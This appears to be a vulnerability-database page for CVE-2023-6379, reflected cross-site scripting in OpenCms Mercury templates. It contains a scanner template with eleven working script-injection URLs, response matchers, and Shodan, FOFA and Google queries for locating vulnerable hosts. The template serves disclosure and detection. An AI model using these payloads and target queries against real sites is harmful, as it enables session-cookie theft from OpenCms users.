| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2023-6379 | 10 Jan 202409:06 | – | circl | |
| Alkacon Software OpenCMS Cross-Site Scripting Vulnerability | 13 Dec 202300:00 | – | cnnvd | |
| CVE-2023-6379 | 13 Dec 202310:52 | – | cve | |
| CVE-2023-6379 Cross-site Scripting in Alkacon Software OpenCms | 13 Dec 202310:52 | – | cvelist | |
| Alkacon OpenCMS XSS via Mercury template | 13 Dec 202312:30 | – | github | |
| CVE-2023-6379 | 13 Dec 202311:15 | – | nvd | |
| GHSA-W62V-Q77R-66CC Alkacon OpenCMS XSS via Mercury template | 13 Dec 202312:30 | – | osv | |
| Cross site scripting | 13 Dec 202311:15 | – | prion | |
| PT-2023-32634 · Alkacon · Opencms | 13 Dec 202300:00 | – | ptsecurity | |
| CVE-2023-6379 Cross-site Scripting in Alkacon Software OpenCms | 13 Dec 202310:52 | – | vulnrichment |
id: CVE-2023-6379
info:
name: OpenCMS 14 & 15 - Cross Site Scripting
author: msegoviag
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template.
impact: |
Unauthenticated attackers can inject malicious JavaScript through multiple parameters in OpenCMS Mercury template pages to steal user session cookies and execute attacks against OpenCMS users.
remediation: |
Update to version OpenCMS 16
reference:
- https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2023-6379
- https://nvd.nist.gov/vuln/detail/CVE-2023-6379
- https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-alkacon-software-opencms
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://github.com/msegoviag/msegoviag
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-6379
cwe-id: CWE-79
epss-score: 0.01752
epss-percentile: 0.75172
cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 11
vendor: alkacon
product: opencms
shodan-query:
- title:"opencms"
- http.title:"opencms"
- cpe:"cpe:2.3:a:alkacon:opencms"
- /opencms/
fofa-query: title="opencms"
google-query: intitle:"opencms"
tags: cve2023,cve,opencms,xss,alkacon,vuln
http:
- method: GET
path:
- "{{BaseURL}}{{paths}}"
payloads:
paths:
- '/tagebuch/eintraege/index.html?reloaded&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '/list-editor/index.html?reloaded&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '/advanced-elements/list/index.html?reloaded&sort=date_asc&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '/advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '/lists/compact/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '/lists/elaborate/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '/lists/text-tiles/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '/lists/masonry/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '/blog/articles/index.html?reloaded&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '/advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842=&InputField-61939054842=1&captcha_token_id=1"><script>alert(document.domain)<%2fscript>ufs5prh3qfe&captchaphrase1939054842=1'
- '/content-elements/job-ad/index.html?reloaded&sort=date_desc&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"><script>alert(document.domain)</script>" />'
- 'OpenCms'
condition: and
- type: word
part: content_type
words:
- "text/html"
- type: status
status:
- 200
# digest: 4b0a0048304602210081416be10ddf19a505e3f55f7798de06465bc464f69c55516416c3a8dcc88668022100d357c65acd4daa715550725f277f7d594ce925940c9bad6b1ee725cef099651e:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation